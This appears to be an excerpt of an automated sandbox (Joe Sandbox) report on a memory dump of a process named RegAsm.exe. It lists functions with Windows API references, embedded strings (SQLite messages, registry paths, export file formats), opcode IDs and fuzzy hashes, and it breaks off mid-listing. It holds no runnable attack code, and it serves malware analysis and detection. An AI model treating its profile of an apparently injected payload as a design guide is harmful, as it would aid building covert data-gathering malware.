                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintfwcscat
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 384018552-4153097237
                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                          • String ID: 0$6
                                          • API String ID: 2029023288-3849865405
                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                          • memset.MSVCRT ref: 00405455
                                          • memset.MSVCRT ref: 0040546C
                                          • memset.MSVCRT ref: 00405483
                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$memcpy$ErrorLast
                                          • String ID: 6$\
                                          • API String ID: 404372293-1284684873
                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                          Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: AttributesErrorFileLastSleep$free
                                          • String ID:
                                          • API String ID: 1470729244-0
                                          • Opcode ID: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                          • Opcode Fuzzy Hash: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                          • wcscpy.MSVCRT ref: 0040A0D9
                                          • wcscat.MSVCRT ref: 0040A0E6
                                          • wcscat.MSVCRT ref: 0040A0F5
                                          • wcscpy.MSVCRT ref: 0040A107
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                          • String ID:
                                          • API String ID: 1331804452-0
                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                          • <%s>, xrefs: 004100A6
                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3473751417-2880344631
                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcscat$_snwprintfmemset
                                          • String ID: %2.2X
                                          • API String ID: 2521778956-791839006
                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintfwcscpy
                                          • String ID: dialog_%d$general$menu_%d$strings
                                          • API String ID: 999028693-502967061
                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                          • memset.MSVCRT ref: 0040C439
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                          • _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          • memset.MSVCRT ref: 0040C4D0
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                          • String ID:
                                          • API String ID: 4131475296-0
                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004116FF
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          • API String ID: 2618321458-3614832568
                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: AttributesFilefreememset
                                          • String ID:
                                          • API String ID: 2507021081-0
                                          • Opcode ID: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                          • Opcode Fuzzy Hash: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                          • malloc.MSVCRT ref: 00417524
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                          • free.MSVCRT ref: 00417544
                                          • free.MSVCRT ref: 00417562
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                          • String ID:
                                          • API String ID: 4131324427-0
                                          • Opcode ID: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                          • Opcode Fuzzy Hash: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                          • free.MSVCRT ref: 0041822B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PathTemp$free
                                          • String ID: %s\etilqs_$etilqs_
                                          • API String ID: 924794160-1420421710
                                          • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                          • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLastMessage_snwprintf
                                          • String ID: Error$Error %d: %s
                                          • API String ID: 313946961-1552265934
                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: foreign key constraint failed$new$oid$old
                                          • API String ID: 0-1953309616
                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                          • API String ID: 3510742995-272990098
                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0044A6EB
                                          • memset.MSVCRT ref: 0044A6FB
                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: gj
                                          • API String ID: 1297977491-4203073231
                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                          • free.MSVCRT ref: 0040E9D3
                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@$free
                                          • String ID:
                                          • API String ID: 2241099983-0
                                          • Opcode ID: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                          • Opcode Fuzzy Hash: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                          • malloc.MSVCRT ref: 004174BD
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                          • free.MSVCRT ref: 004174E4
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                          • String ID:
                                          • API String ID: 4053608372-0
                                          • Opcode ID: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                          • Opcode Fuzzy Hash: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 0040D453
                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          • API String ID: 4247780290-0
                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                          • memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                          • String ID:
                                          • API String ID: 1471605966-0
                                          • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                          • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
